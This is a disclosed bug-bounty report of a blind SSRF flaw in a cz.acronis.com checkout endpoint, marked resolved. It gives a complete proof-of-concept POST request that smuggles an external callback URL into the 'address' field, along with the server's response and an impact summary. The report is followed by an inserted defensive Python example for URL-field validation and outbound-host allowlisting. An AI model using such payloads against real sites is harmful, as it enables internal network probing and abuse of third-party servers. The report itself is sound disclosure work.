Blind SSRF vulnerability on cz.acronis.com

Disclosed: 2024-08-27 14:04:30 By cabelo To acronis
Medium
Vulnerability Details
Hello Acronis team. I would like to report a Blind SSRF vulnerability on cz.acronis.com.

Affected URL: https://cz.acronis.com/wp-admin/admin-ajax.php

Vulnerable parameters: address and company

POC: POST request, payload in the address body parameter:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: cz.acronis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://cz.acronis.com/kosik/?item=7200
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 582
Connection: close
Cookie: _ga=GA1.2.1144740602.1610556882; _fbp=fb.1.1610556883161.353705208; leady_session_id=8dd6174f-2994-4c5c-977f-d58ab8931a83; _gid=GA1.2.696910190.1611347375; PHPSESSID=ej1u101q1es5tb127hitsqscp5; has_js=1; language_prefix=sortiment

items%5B0%5D%5Bname%5D=Acronis+Disk+Director+12.5+Home+1+PC&items%5B0%5D%5Bprice%5D=1056&items%5B0%5D%5BformattedPrice%5D=1056.00k%C4%8D&totalSurcharge=1056&addItem=undefined&removeItem=undefined&recalculate=undefined&name=Jmone&isCompany=YES&notifier_x-iscompany=NO&undefined=false&deliveryClearKatakana=true&company=&surname=Pifsf&deliveryClearRomanized=true&address=http%3a%2f%2fjczo3ewu8jpfgyiajmkacspsnjtbh0.burpcollaborator.net/ssrf&zip=25458&city=sdfasd&ico=&dic=&email=test%40fgmail.com&phone=%2B420+724+023+780&newsletter=false&notifier_x-newsletter=NO&action=createPayment
```

App response:

```
HTTP/1.1 200 OK
Date: Sun, 24 Jan 2021 22:46:17 GMT
Server: Apache/2.4.38 (Debian)
Pragma: no-cache
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Vary: Accept-Encoding
Upgrade: h2,h2c
Connection: Upgrade, close
Referrer-Policy:
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 92
Content-Type: text/html; charset=UTF-8

{"status":"ok","gw_url":"https:\/\/gate.gopay.cz\/gw\/v3\/eec2d2792d0935ea959b71b0762a4559"}
```

Callback HTTP connection from Acronis server 109.123.216.85 (SSRF vulnerability):

{F1170498}
{F1170497}

For more information about the execution context, please send me a message.

Regards

## Impact

Blind SSRF: this vulnerability allows any unauthenticated user/client to make WordPress send HTTP requests to any URL/address (internal or external). Other attacks can be performed using this vulnerability, such as network amplification attacks against other systems that it can interact with.
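The root cause described in the report is a postal-address form field being handed to server-side code that fetches whatever URL it contains. The following is an added example (not code from the report or from Acronis/WordPress) of the two controls a maintainer would put in front of that handler: rejecting URL-like values in fields that should never contain a URL, and gating any outbound fetch behind a host allowlist plus a check that the host resolves only to public addresses. The allowlist entry `gate.gopay.cz` is taken from the `gw_url` in the response above; the function names, the `resolve` callback and the sample form values are assumptions of this example.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

# Hosts the payment handler is legitimately allowed to contact.
# Assumed allowlist for this example (the gateway host comes from the
# gw_url in the report's response); a real deployment configures this.
OUTBOUND_HOST_ALLOWLIST = {"gate.gopay.cz"}

# Matches "scheme://..." at the start of a value; a postal address,
# company or person name should never look like this.
_URL_LIKE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def looks_like_url(field_value: str) -> bool:
    """True when a free-text form field carries a scheme://... value."""
    return bool(_URL_LIKE.match(field_value))


def validate_checkout(form: dict) -> list[str]:
    """Return rejection reasons for a createPayment-style form.

    Fields that are copied into downstream requests must be plain text;
    anything URL-like is refused before the handler does any I/O.
    """
    problems = []
    for field in ("address", "company", "name", "surname", "city"):
        if looks_like_url(form.get(field, "")):
            problems.append(f"{field}: URL-like value rejected")
    return problems


def _default_resolve(host: str) -> list[str]:
    """Resolve a host name to its IP addresses (real DNS; not used offline)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_outbound_url(url: str, resolve=_default_resolve) -> tuple[bool, str]:
    """Decide whether server-side code may fetch `url`.

    Returns (allowed, reason). The resolver is injectable so the check
    can be unit-tested without network access.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    if host.lower() not in OUTBOUND_HOST_ALLOWLIST:
        return False, f"host not in allowlist: {host}"
    # Even an allowlisted name must resolve to public addresses, so a
    # poisoned or rebinding record cannot redirect the fetch inward.
    try:
        addrs = resolve(host)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample form mirroring the shape of the report's request.
    sample = {"name": "Jmone", "surname": "Pifsf", "company": "",
              "address": "http://collaborator.example/ssrf", "city": "sdfasd"}
    print(validate_checkout(sample))
    print(is_safe_outbound_url("https://gate.gopay.cz/gw/v3/abc",
                               resolve=lambda h: ["93.184.216.34"]))
```

The field check is the cheap fix for this specific bug class; the outbound guard is the general one and belongs in whatever wrapper the site uses for server-side HTTP, since allowlisting by name alone still lets an attacker-controlled DNS answer point at internal ranges.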
Report Stats
  • Report ID: 1086206
  • State: Closed
  • Substate: resolved
  • Upvotes: 28